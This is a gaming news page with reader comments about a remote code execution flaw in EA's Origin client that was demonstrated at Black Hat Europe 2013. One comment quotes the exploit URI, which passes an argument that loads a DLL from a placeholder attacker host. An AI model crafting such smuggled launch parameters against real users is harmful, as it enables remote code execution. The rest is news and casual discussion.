Send News. Want a reply? Read this. More in the FAQ.   News Forum - All Forums - Mobile - PDA - RSS Headlines  RSS Headlines   Twitter  Twitter
Customize
User Settings
Styles:
LAN Parties
Upcoming one-time events:

Regularly scheduled events

Origin Vulnerable to Remote Execution

Ars Technica has details from a demonstration at the Black Hat Europe 2013 conference showing a remote code execution vulnerability in the client software for EA's Origin on both Windows and OS X machines. Similar to a problem identified last year on Valve's Steam, this involves using a malformed URL to trick clients into executing unauthorized code, and the researches took over a remote computer by exploiting this behavior. They have a follow-up comment on this from EA saying: "Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure."

View
16 Replies. 1 pages. Viewing page 1.
< Newer [ 1 ] Older >

16. Re: Origin Vulnerable to Remote Execution Mar 19, 2013, 17:52 Clancy
 
Yeah, pretty much the same issue steam had.

All these clients need to operate in a sand box, and not touch anything else.
 
Reply Quote Edit Delete Report
 
15. Re: Origin Vulnerable to Remote Execution Mar 19, 2013, 14:32 avianflu
 

the underlying more serious issue is that all network game clients have too many non-obvious tendrils threaded into the system kernel and web browsers.

In this instance the issue is that, anytime after installing the game client, you have the "feature" of being able to launch a game installed on your computer thru a URL on a web page.

It is just a matter of time for Origin or Steam or UPLay to become a genuine matter of concern to us all.
 
Reply Quote Edit Delete Report
 
14. Re: Origin Vulnerable to Remote Execution Mar 19, 2013, 11:10 Creston
 
xXBatmanXx wrote on Mar 18, 2013, 22:44:
Most people are safe though, because there is a queue to run the remote execution. By the time the hacker gets a chance at your account, you are probably logged out of Origin.

*Gigglesnort*

Good one

Creston
 
Avatar 15604
 
Reply Quote Edit Delete Report
 
13. Re: Origin Vulnerable to Remote Execution Mar 19, 2013, 11:09 Creston
 
Verno wrote on Mar 19, 2013, 10:46:
Not a big deal, EA will fix it up.

Yeah, they'd be stupid to leave that bug in there now that it's public knowledge. IIRC, it didn't take Valve that long to fix it?

Creston
 
Avatar 15604
 
Reply Quote Edit Delete Report
 
12. Re: Origin Vulnerable to Remote Execution Mar 19, 2013, 10:46 Verno
 
Not a big deal, EA will fix it up.  
Avatar 51617
 
Playing: Fire Emblem, Diablo 3, Bravely Default
Watching: The Machine, After the Dark, Devils Due
Reply Quote Edit Delete Report
 
11. Re: More Big Picture Details Mar 19, 2013, 10:29 HorrorScope
 
I have never been attacked in this manner. Hard to get really nervous about it. I should worry more about driving to appointments today, if I go by the numbers.  
Avatar 17232
 
Reply Quote Edit Delete Report
 
10. Re: Origin Vulnerable to Remote Execution Mar 19, 2013, 04:18 InBlack
 
"Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure."

Translation: As long as you keep giving us money for buggy non functional software we dont really give a shit and we will gladly take more.
 
Avatar 46994
 
I have a nifty blue line!
Reply Quote Edit Delete Report
 
9. Re: Origin Vulnerable to Remote Execution Mar 19, 2013, 04:07 DangerDog
 
The researchers' demo shows them taking control of a computer that has the Origin client and Crysis 3 game installed. Behind the scenes, the EA platform uses the origin://LaunchGame/71503 link to activate the game. When a targeted user instead clicks on a URI such as origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, the Origin client will load a Windows dynamic link library file of the attackers' choosing on the victim's computer

so you need to have an "evil" dll installed on your system, and click on a malformed link to get the code executed.

I'm not going to lose any sleep over that one, people trying to run pirated Origin games beware though - so easy to sneak a dll into the install.
 
Avatar 6174
 
Reply Quote Edit Delete Report
 
8. Re: Origin Vulnerable to Remote Execution Mar 19, 2013, 03:57 Pumas
 
If remote execution means shoot it with a sniper rifle, then I'm for it.  
How will I know limits from lies if I never try?
Reply Quote Edit Delete Report
 
7. Re: Origin Vulnerable to Remote Execution Mar 19, 2013, 00:49 Jivaro
 
deqer wrote on Mar 18, 2013, 23:54:
EA, you're 10 years behind Steam even when you get hacked! lulz

fixed.
 
Reply Quote Edit Delete Report
 
6. Re: Origin Vulnerable to Remote Execution Mar 18, 2013, 23:54 deqer
 
EA, you're 10 years behind Steam. lulz
 
Reply Quote Edit Delete Report
 
5. Re: Origin Vulnerable to Remote Execution Mar 18, 2013, 22:44 xXBatmanXx
 
Most people are safe though, because there is a queue to run the remote execution. By the time the hacker gets a chance at your account, you are probably logged out of Origin.  
Avatar 10714
 
In this present crisis, government is not the solution to our problem; government is the problem. / Few men have virtue enough to withstand the highest bidder.
Playing: New dad
Reply Quote Edit Delete Report
 
4. Re: Origin Vulnerable to Remote Execution Mar 18, 2013, 22:05 nin
 
Just like Steam was/is,


Yeah, sounds identical.

 
http://www.nin.com/pub/tension/
Reply Quote Edit Delete Report
 
3. Re: Origin Vulnerable to Remote Execution Mar 18, 2013, 21:56 Prez
 
Just like Steam was/is, and probably not worth worrying about. Just don't leave it running, and, if you are really paranoid, manually stop and start the Origin service in taskmanager as needed.  
Avatar 17185
 
Goodbye my Monte boy. May you rest in the peace you never knew in life.
Reply Quote Edit Delete Report
 
2. Re: Origin Vulnerable to Remote Execution Mar 18, 2013, 21:21 Saboth
 
"As part of our vision for Origin, we've made it easier to connect with random friends on the internet, through your computer."  
Reply Quote Edit Delete Report
 
1. Re: Origin Vulnerable to Remote Execution Mar 18, 2013, 21:07 Longswd
 
"Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure."

Seeings as how they became aware of this through a demonstration, I would say it's no longer "hypothetical".
 
I don't always drink carbonated Mexican rat piss, but when I do, I prefer Dos Equis.
Reply Quote Edit Delete Report
 
16 Replies. 1 pages. Viewing page 1.
< Newer [ 1 ] Older >


footer

.. .. ..

Blue's News logo